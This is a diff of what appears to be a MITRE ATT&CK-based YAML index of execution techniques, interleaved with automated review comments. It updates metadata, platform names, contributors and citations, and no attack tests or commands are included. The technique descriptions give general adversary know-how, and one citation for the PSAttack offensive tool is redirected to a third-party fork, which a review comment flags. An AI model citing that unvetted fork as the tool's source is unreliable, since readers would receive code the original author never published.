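Review bot: the platform rename in this hunk (`Azure AD`, `Office 365`, `Google Workspace` replaced by `Identity Provider`, `Office Suite`) changes the keys that per-platform indexes and any `supported_platforms` filtering are built on; every artifact derived from this file that is keyed on the old names needs regenerating in the same change, otherwise tests previously indexed under those platforms silently disappear. The same rename is applied to T1059 further down, so a grep for the old platform strings across the generated indexes would confirm nothing is left behind.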
@@ -25634,13 +25946,12 @@ execution:
url: https://github.com/Azure/azure-powershell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -25719,12 +26030,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests: []
T1059:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Command and Scripting Interpreter
description: |-
Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -25735,6 +26045,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: |-
Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -25745,16 +26056,16 @@ execution:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- - Office 365
- - Azure AD
- IaaS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Script: Script Execution'
- 'Process: Process Creation'
@@ -25785,14 +26096,11 @@ execution:
url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059
atomic_tests: []
T1609:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:25:45.507Z'
name: Kubernetes Exec Into Container
description: |-
Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
@@ -25858,39 +26166,13 @@ execution:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1609
atomic_tests: []
T1569.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
- type: attack-pattern
- created: '2020-03-10T18:26:56.187Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569.001
- url: https://attack.mitre.org/techniques/T1569/001
- - source_name: Launchctl Man
- url: https://ss64.com/osx/launchctl.html
- description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
- - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
- description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
- Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
- source_name: Sofacy Komplex Trojan
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-20T20:14:35.179Z'
name: 'System Services: Launchctl'
description: |
Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
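Review bot: this hunk removes T1569.001's `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and the whole `external_references` list; they come back lower in the object in the following hunk with the same values (`attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d`, `2020-03-10T18:26:56.187Z`, the same three URLs), so the net change is key reordering plus the `modified` bump. What makes the diff large is that the reference entries change internal key order (`url` moves after `description`) and list order (Launchctl Man moves from first to last). A stable key and list ordering in the generator would keep future diffs reviewable.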
@@ -25899,6 +26181,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
plist file on disk which can be monitored. Monitor for recently modified or
created plist files with a significant change to the executable path executed
@@ -25911,19 +26194,42 @@ execution:
are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
the services are unloaded prior to deleting plist files."
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- 'Service: Service Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+ created: '2020-03-10T18:26:56.187Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569/001
+ external_id: T1569.001
+ - source_name: Sofacy Komplex Trojan
+ description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+ Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+ url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ - source_name: Launchctl Man
+ description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+ url: https://ss64.com/osx/launchctl.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1569.001
atomic_tests: []
T1059.008:
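Review bot: `x_mitre_permissions_required` (`User`, `root`) is dropped from T1569.001 with nothing taking its place, while `x_mitre_remote_support: false` and `revoked: false` are new; the version moves 1.1 to 1.2 and `x_mitre_attack_spec_version` jumps from 2.1.0 to 3.2.0 in one step. Any report or index column that reads the permissions field now comes back empty for this technique. If the field is deprecated in the newer spec, say so in the commit message so the loss is understood as intentional rather than a generator regression.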
@@ -25966,7 +26272,7 @@ execution:
data, modify startup configuration parameters to load malicious system software,
or to disable security features or logging to avoid detection.(Citation: Cisco
Synful Knock Evolution)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T20:28:09.848Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Device CLI
x_mitre_detection: |-
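Review bot: T1059.008's `modified` timestamp moves backwards, from `2022-05-11T14:00:00.188Z` to `2022-04-19T20:28:09.848Z`, while `x_mitre_attack_spec_version` stays at 2.1.0 and the only other change to the object is the removed `spec_version`. Every other technique in this patch moves forward to a 2024 timestamp, so this object looks like it was taken from an older snapshot. Confirm the source for this technique before merging; a regressed `modified` value makes change-tracking tools treat the newer copy as stale.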
@@ -25982,72 +26288,75 @@ execution:
x_mitre_remote_support: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1559.003:
technique:
- x_mitre_platforms:
- - macOS
+ modified: '2024-10-16T16:14:12.793Z'
+ name: XPC Services
+ description: |-
+ Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+ Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_contributors:
+ - Csaba Fitzl @theevilbit of Kandji
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Csaba Fitzl @theevilbit of Offensive Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ x_mitre_remote_support: false
type: attack-pattern
id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
created: '2021-10-12T06:45:36.763Z'
- x_mitre_version: '1.0'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1559.003
url: https://attack.mitre.org/techniques/T1559/003
+ external_id: T1559.003
- source_name: creatingXPCservices
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
description: Apple. (2016, September 9). Creating XPC Services. Retrieved
April 19, 2022.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
- source_name: Designing Daemons Apple Dev
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
description: Apple. (n.d.). Retrieved October 12, 2021.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
- source_name: CVMServer Vuln
- url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
in macOS and iOS. Retrieved October 12, 2021.'
+ url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
- source_name: Learn XPC Exploitation
- url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
October 12, 2021.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
- Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XPC Services
- x_mitre_detection: ''
- kill_chain_phases:
- - phase_name: execution
- kill_chain_name: mitre-attack
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Process: Process Access'
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204:
technique:
- modified: '2024-04-12T03:46:49.507Z'
+ modified: '2024-11-11T18:52:12.103Z'
name: User Execution
description: |-
An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
- Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ Adversaries may also deceive users into performing actions such as:
+
+ * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+ * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+ * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
kill_chain_phases:
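Review bot: the new T1204 description bullet `* Coerceing users to copy, paste, and execute malicious code manually` carries a typo (`Coercing`); because the description mirrors the upstream technique text, fix it upstream or state that the index reproduces upstream verbatim rather than patching it locally. Two other changes in this hunk deserve a line in the commit message: the T1559.003 contributor affiliation changes from `Csaba Fitzl @theevilbit of Offensive Security` to `Csaba Fitzl @theevilbit of Kandji`, and `x_mitre_detection: ''` is still empty for T1559.003 after it is re-serialised under spec 3.2.0, so no detection guidance was added for XPC Services in this update.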
@@ -26055,7 +26364,11 @@ execution:
phase_name: execution
x_mitre_contributors:
- Oleg Skulkin, Group-IB
- - Goldstein Menachem
+ - Menachem Goldstein
+ - Harikrishnan Muthu, Cyble
+ - ReliaQuest
+ - Ale Houspanossian
+ - Fernando Bacchin
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -26070,7 +26383,7 @@ execution:
- macOS
- IaaS
- Containers
- x_mitre_version: '1.6'
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Instance: Instance Start'
- 'File: File Creation'
@@ -26097,6 +26410,10 @@ execution:
description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
Bookmarks. Retrieved January 2, 2024.
url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+ - source_name: Reliaquest-execution
+ description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+ Campaign. Retrieved August 2, 2024.
+ url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
- source_name: Telephone Attack Delivery
description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
@@ -26107,15 +26424,19 @@ execution:
API forms and more to scam users in popular online game “Roblox”. Retrieved
January 2, 2024.
url: https://blog.talosintelligence.com/roblox-scam-overview/
+ - source_name: proofpoint-selfpwn
+ description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+ From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+ 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
@@ -26132,7 +26453,7 @@ execution:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -26180,7 +26501,7 @@ execution:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -26213,12 +26534,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests: []
T1059.001:
technique:
- modified: '2024-03-01T18:01:37.575Z'
+ modified: '2024-10-15T16:39:13.228Z'
name: 'Command and Scripting Interpreter: PowerShell'
description: |-
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process
cmdlet which can be used to run an executable and the Invoke-Command
cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -26279,8 +26599,9 @@ execution:
POWERSHELL LOGGING. Retrieved February 16, 2016.
url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
- source_name: Github PSAttack
- description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
- url: https://github.com/jaredhaight/PSAttack
+ description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+ 2024.
+ url: https://github.com/Exploit-install/PSAttack-1
- source_name: inv_ps_attacks
description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
Retrieved December 1, 2021.
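Review bot: the `Github PSAttack` citation URL changes from `https://github.com/jaredhaight/PSAttack` to `https://github.com/Exploit-install/PSAttack-1`, a repository under a different account from the author the description names (`Haight, J.`). Pointing a reference for an offensive tool at a third-party fork is a provenance problem: readers following the link get code the original author never published, and the fork can be changed at any time. Unless the original repository is gone, keep the author's URL (or an archive.org capture of it); if the mirror is deliberate, say why in the description alongside the new retrieval date.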
@@ -26302,12 +26623,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.001
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -26385,14 +26705,13 @@ execution:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1059.004:
technique:
- modified: '2024-04-16T12:24:40.163Z'
+ modified: '2024-10-15T15:17:19.136Z'
name: 'Command and Scripting Interpreter: Bash'
description: |-
Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -26450,36 +26769,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.004
atomic_tests: []
T1559:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
- type: attack-pattern
- created: '2020-02-12T14:08:48.689Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1559
- url: https://attack.mitre.org/techniques/T1559
- - source_name: Linux IPC
- url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
- description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
- March 11, 2022.
- - source_name: Fireeye Hunting COM June 2019
- url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
- description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
- 10, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-10T19:06:35.666Z'
name: Inter-Process Communication
description: "Adversaries may abuse inter-process communication (IPC) mechanisms
for local code or command execution. IPC is typically used by processes to
@@ -26500,25 +26794,110 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
or spawned processes that are associated with abuse of IPC mechanisms.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Process: Process Access'
- x_mitre_permissions_required:
- - Administrator
- - User
- - SYSTEM
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+ created: '2020-02-12T14:08:48.689Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1559
+ external_id: T1559
+ - source_name: Fireeye Hunting COM June 2019
+ description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+ 10, 2019.
+ url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+ - source_name: Linux IPC
+ description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+ March 11, 2022.
+ url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1559
atomic_tests: []
+ T1059.011:
+ technique:
+ modified: '2024-10-01T15:19:54.163Z'
+ name: Lua
+ description: |-
+ Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (.lua
), or from Lua-embedded programs (through the struct lua_State
).(Citation: Lua main page)(Citation: Lua state)
+
+ Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Script: Script Execution'
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+ created: '2024-08-05T18:19:42.201Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/011
+ external_id: T1059.011
+ - source_name: Kaspersky Lua
+ description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+ APT. Retrieved August 5, 2024.
+ url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+ - source_name: Lua main page
+ description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+ url: https://www.lua.org/start.html
+ - source_name: Lua state
+ description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+ url: https://pgl.yoyo.org/luai/i/lua_State
+ - source_name: Cyphort EvilBunny
